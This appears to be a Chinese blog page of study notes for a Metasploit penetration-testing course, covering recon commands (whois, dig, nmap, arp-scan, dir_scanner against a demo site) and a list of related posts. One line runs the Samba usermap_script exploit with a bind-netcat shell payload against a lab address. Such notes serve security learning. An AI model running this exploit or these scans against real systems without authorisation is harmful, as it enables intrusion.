总结一句话  漏洞  攻击   拿权限  维持访问

课程目标
掌握黑客渗透攻击流程
掌握常用攻击软件     渗透测试工程师
掌握常见windows漏洞挖掘和攻击
掌握常见linux漏洞挖掘和攻击
参考书籍
《Metasploit渗透测试指南》肯尼(行业经典) 最详细
《Metasloit渗透测试魔鬼训练营》 诸葛建伟(国内经典) 靠谱、拓扑图
《网络攻防技术与实践》诸葛建伟(清华大学网络安全课) 基础入门
《黑客大曝光》--经典,编程****************************************
讲义目录
常用命令
startx 进入图形界面
进入unity模式
whois pinginglab.com
有相关信息
nsloopup    set type=A  /填写特定的域名/  dns
dig   为准
arpping    arp-scan --interface=eth2 10.10.10.0/24
网段扫描  nbtscan 172.17.21.0/24
主机扫描  nmap 172.17.21.96 -a 可带参数
meta环境 msfconsole
msf > use auxiliary/scanner/discovery/arp_sweep
************************************************
wifi密码破解
************************************************
msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=10.10.10.254 E
********************************************************************************************************************************************************
工具介绍
环境搭建  (连通性测试)
testfire.net
msf>whois testfire.com   查询域名信息
root@bt:~#  nsloopup
>set type=A  ;;设置对其ip地址进行解析  MX查找其邮件转发
>testfire.net   ;;域名或ip
...........................   
>exit

root@bt:~# dig @ns.watson.ibm.com testfire.net  ;;
............................
使用Google hacking技术搜索网站目录

扩展名inc:可能包含网站配置信息,如数据库用户名/口令
扩展名bak:通常是一些文本编辑器源代码留下的备份文件,程序脚本文件大致内容
扩展名tex或sql:sql脚本,数据库结构等信息
使用dir_scanner辅助模块来搜索网站目录(testfire.net)

msf > use auxiliary/scanner/http/dir_scanner
msf  auxiliary(dir_scanner) > set THREADS 100
THREADS => 100
msf  auxiliary(dir_scanner) > set RHOSTS www.testfire.net
RHOSTS => www.testfire.net
msf  auxiliary(dir_scanner) > exploit
...........................................;;发现一个Admin隐藏目录,返回HTTP 403

端口扫描
arp_sweep 扫描
msf >use auxiliary/scanner/discovery/arp_sweep
namp 扫描
直接  namp -A ip
msf>namp -PU -sn ip
操作系统辨别
msf >nmap -O  ip


Metasloit渗透测试魔鬼训练营的更多相关文章

  1. Metasploit渗透测试魔鬼训练营

    首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法 ...

  2. 《Metasploit渗透测试魔鬼训练营》第一章读书笔记

    第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...

  3. 《metasploit渗透测试魔鬼训练营》学习笔记第四章—web应用渗透

    继续来学习metasploit...记好笔记是很重要的,下面开始正文: 二.WEB应用渗透技术     1.WEB应用渗透基础知识        先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查 ...

  4. 《metasploit渗透测试魔鬼训练营》学习笔记第三章----情报搜集

    Kali渗透测试系统集成了metasploit开源的漏洞测试框架,是渗透测试必备的神器.下面是我在学习metasploit的笔记,有什么错误的地方请指出来,我会立即纠正的~ 一.情报搜集     1. ...

  5. 【笔记】metasploit渗透测试魔鬼训练营-信息搜集

    exploit 漏洞利用代码 编码器模块:免杀.控制 help [cmd] msfcli适合对网络中大量系统统一测试. 打开数据包路由转发功能:/etc/sysctl.conf /etc/rc.loc ...

  6. 《metasploit渗透测试魔鬼训练营》学习笔记第九章--meterpreter

    七.强大的meterpreter  7.1再探metasploit的攻击载荷模块     7.1.1典型的攻击载荷模块     metasploit涵盖了各大主流操作系统和平台,其中绝大部分是远程漏洞 ...

  7. 《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透

    四.客户端攻击      客户端攻击与服务端攻击有个显著不同的标识,就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出,而是需要结合一些社会工程学技巧,诱使客户端用户去访问这些恶意 ...

  8. 《metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例KingView 6.53版本CVE-2011-0406漏洞

    在一个笔记本上开两个虚拟机有点卡,而且太麻烦,就把metasploit的目标靶机放在别的机器上了,ip自己配置了一下, 目标主机:192.168.137.254 入侵机:192.168.137.253 ...

  9. 《metasploit渗透测试魔鬼训练营》学习笔记第五章--网络服务渗透攻击

    三.网络服务渗透攻击 3.1 内存攻防技术      3.1.1 缓冲区溢出漏洞机理              缓冲区溢出是程序由于缺乏对缓冲区的边界条件检查而引起的一种异常行为.           ...

随机推荐

  1. angularjs ngRoute的使用简单例子

    很丑的小例子,刚学angularjs,写下来方面以后看. 1.例子的工程目录如下: 2.index.html代码如下: <!DOCTYPE html><html><hea ...

  2. Last Defence - UVA7045

    https://icpcarchive.ecs.baylor.edu/index.php?option=com_onlinejudge&Itemid=8&page=show_probl ...

  3. Intersection of Two Linked Lists(链表)

    Write a program to find the node at which the intersection of two singly linked lists begins. For ex ...

  4. eclipse菜单字体乱码的解决

    方法一: 这个跟活动控制台代码页有关. 如果要更改为 UTF-8,则需要运行 chcp 命令: chcp 65001 有时新安装的系统可能在运行一些中文软件时显示错乱,可通过控制面板修改系统区域来管理 ...

  5. arcengine 文件夹连接

    Provides access to members that manages a GX catalog. Product Availability Available with ArcGIS Des ...

  6. zookeeper客户端

    查看具体结点信息 bash zkServer.sh status 查看哪个结点被选作leader或者followerecho stat|nc 127.0.0.1 2181 测试是否启动了该Server ...

  7. 转: java DES的算法片码

    转自: https://www.zhihu.com/question/36767829 作者:郭无心链接:https://www.zhihu.com/question/36767829/answer/ ...

  8. Linux 的 Socket IO 模型

    前言 之前有看到用很幽默的方式讲解Windows的socket IO模型,借用这个故事,讲解下linux的socket IO模型: 老陈有一个在外地工作的女儿,不能经常回来,老陈和她通过信件联系. 他 ...

  9. MySQL 温故而知新--Innodb存储引擎中的锁

    近期碰到非常多锁问题.所以攻克了后,细致再去阅读了关于锁的书籍,整理例如以下:1,锁的种类 Innodb存储引擎实现了例如以下2种标准的行级锁: ? 共享锁(S lock),同意事务读取一行数据. ? ...

  10. 深度学习笔记之基于R-CNN的物体检测

    不多说,直接上干货! 基于R-CNN的物体检测 原文地址:http://blog.csdn.net/hjimce/article/details/50187029 作者:hjimce 一.相关理论 本 ...